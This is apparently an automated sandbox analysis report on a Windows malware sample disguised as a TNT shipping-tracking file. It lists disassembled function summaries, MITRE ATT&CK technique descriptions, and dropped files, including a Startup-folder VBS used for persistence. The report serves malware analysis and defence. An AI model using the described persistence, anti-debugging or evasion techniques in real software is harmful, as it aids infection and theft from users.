Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 82291c2e891632d0fb10f98571807b3a24d6ad1bc27cc4444c01eb91bfba8738
Instruction ID: 664663c049fd3bb8bfebee2e9d431ed9af526a4e329195df9315290d44f436d1
Opcode Fuzzy Hash: 82291c2e891632d0fb10f98571807b3a24d6ad1bc27cc4444c01eb91bfba8738
Instruction Fuzzy Hash: 12E09B3350022D2AD7209655AC45FA7F7ECDB55B61F010066FD04D7051D9609A4587D0

Function 00ADB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00ADB314: _memset.LIBCMT ref: 00ADB321

Part of subcall function 00AC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ADB2F0,?,?,?,00AA100A), ref: 00AC0945

IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00ADB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00ADB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ADB2FE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: fcdb14b526cf4663badfaa2451620c826b4ebf5e3ef11e6988617b8b1cf50aad
Instruction ID: f7e5bc4a7a70c16a95bfe9ae74ab08bcb2f8c250ee5941ef9e4caad510e5b310
Opcode Fuzzy Hash: fcdb14b526cf4663badfaa2451620c826b4ebf5e3ef11e6988617b8b1cf50aad
Instruction Fuzzy Hash: 9EE03970610701CBD7209F28D504B527AE4AF04744F01897DE446CB750EBB49405DBB1

Function 00AE1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00AE1775

Part of subcall function 00B1BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00AE195E,?), ref: 00B1BFFE
Part of subcall function 00B1BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AE196D

Strings

WIN_XPe, xrefs: 00AE1788

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 43c559d0dcc766b9d41f23bf2eaf074fde993657f85b5893869d1ee4dcd0b2ca
Instruction ID: b8f80756633d4ed0f4f1c60f4587ed101416090a54644e806d5917f90b48e25f
Opcode Fuzzy Hash: 43c559d0dcc766b9d41f23bf2eaf074fde993657f85b5893869d1ee4dcd0b2ca
Instruction Fuzzy Hash: 66F0ED71800159DFDB25DB92C984BECBBF8BB08702F540095E102B3190DB754F85DF60

Function 00B25998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B259AE
PostMessageW.USER32(00000000), ref: 00B259B5

Part of subcall function 00B05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

Strings

Shell_TrayWnd, xrefs: 00B259A7

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9e00685d47c9f55cb41eebc35fbe35f32461e0a03ad87dccedba38986470324d
Instruction ID: 226e48f0261ea9c0fa4dbbe51f9ae38d81c0d5059abd1c22513c5441d558a530
Opcode Fuzzy Hash: 9e00685d47c9f55cb41eebc35fbe35f32461e0a03ad87dccedba38986470324d
Instruction Fuzzy Hash: DBD0C9313803127AE675BB70AC0BFA76A65FF14B51F000875B645AB1E0DDE0A801CA54

Function 00B25964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B2596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B25981

Part of subcall function 00B05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

Strings

Shell_TrayWnd, xrefs: 00B25967

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: bd8ad688ac635aa57277a70880ccb4240377774de87725fd34b8c0a0912d192d
Instruction ID: be2104957af48ba9d6004a7901183084c181153027ee97b361623c64d3ac1391
Opcode Fuzzy Hash: bd8ad688ac635aa57277a70880ccb4240377774de87725fd34b8c0a0912d192d
Instruction Fuzzy Hash: 13D0C931384312B6E675BB70AC1BFA76A65FF10B51F000875B649AB1E0DDE0A801CA54

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TNT AWB TRACKING DETAILS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut1605.tmp

C:\Users\user\AppData\Local\Temp\aut1654.tmp

C:\Users\user\AppData\Local\Temp\autDCC5.tmp

C:\Users\user\AppData\Local\Temp\autDDC0.tmp

C:\Users\user\AppData\Local\Temp\autE522.tmp

C:\Users\user\AppData\Local\Temp\autE580.tmp

C:\Users\user\AppData\Local\Temp\gunfights

C:\Users\user\AppData\Local\Temp\overroughly

C:\Users\user\AppData\Local\Temp\w2-0G0-7

C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Static File Info

Windows Analysis Report
TNT AWB TRACKING DETAILS.exe

Function 00AA3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00AA49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00AA4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre